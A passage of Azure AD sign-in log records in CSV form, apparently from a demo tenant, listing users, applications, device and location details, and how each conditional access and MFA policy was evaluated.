'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",1fc6d415-116e-44c9-a4fc-b8ef261a1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,1fc6d415-116e-44c9-a4fc-b8ef261a1400,SigninLogs,Sucess,33.7984581,-84.38828278
+1202,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:42.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1a1de33-9724-47fa-be54-58201d00ba7e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",86807d56-c656-4319-9bdc-577e31d11300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,86807d56-c656-4319-9bdc-577e31d11300,SigninLogs,Sucess,33.7984581,-84.38828278
+1203,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ec32d17c-6671-4d01-8ad3-e08b3a6af70b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c6df9c5c-6712-4175-a3db-58ce51731700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c6df9c5c-6712-4175-a3db-58ce51731700,SigninLogs,Sucess,36.6404686,-78.26995087
+1204,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,8ccd469f-7038-0000-5421-79fcb5769fe0,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",48cf7de2-e659-4e20-aee0-25dce8231500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,48cf7de2-e659-4e20-aee0-25dce8231500,SigninLogs,Failed,41.90428925,-85.99833679
+1205,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:07.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76884569-4103-4708-ab54-c0dcdbd8d7e7,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",fbcf3a57-b92a-4bcf-a38d-09fb32e41400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,fbcf3a57-b92a-4bcf-a38d-09fb32e41400,SigninLogs,Sucess,41.90428925,-85.99833679
+1206,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:25.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,18b6d84d-a85e-45cf-8526-55327801bb21,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",206c879d-2196-4a7a-8124-0022f7061500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,206c879d-2196-4a7a-8124-0022f7061500,SigninLogs,Sucess,41.90428925,-85.99833679
+1207,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:20.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8d7b9fb-7473-4b3e-a8ba-c6f9fff8ab1f,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",67310a2e-a313-4902-99ba-eeb2ee7d1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,67310a2e-a313-4902-99ba-eeb2ee7d1400,SigninLogs,Sucess,50.6406517,5.572050095
+1208,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:26.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f516ffae-9f78-49a9-9009-3869ee1578ff,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",86807d56-c656-4319-9bdc-577e18cf1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,86807d56-c656-4319-9bdc-577e18cf1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1209,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:56.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a8c6c030-578d-4e20-9e3e-99cfcdefc588,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f81997e3-0b26-42cc-8532-c4de801d1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f81997e3-0b26-42cc-8532-c4de801d1600,SigninLogs,Sucess,33.7984581,-84.38828278
+1210,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:29.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc9e3900-24dd-41a9-87ad-37f07e461673,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': 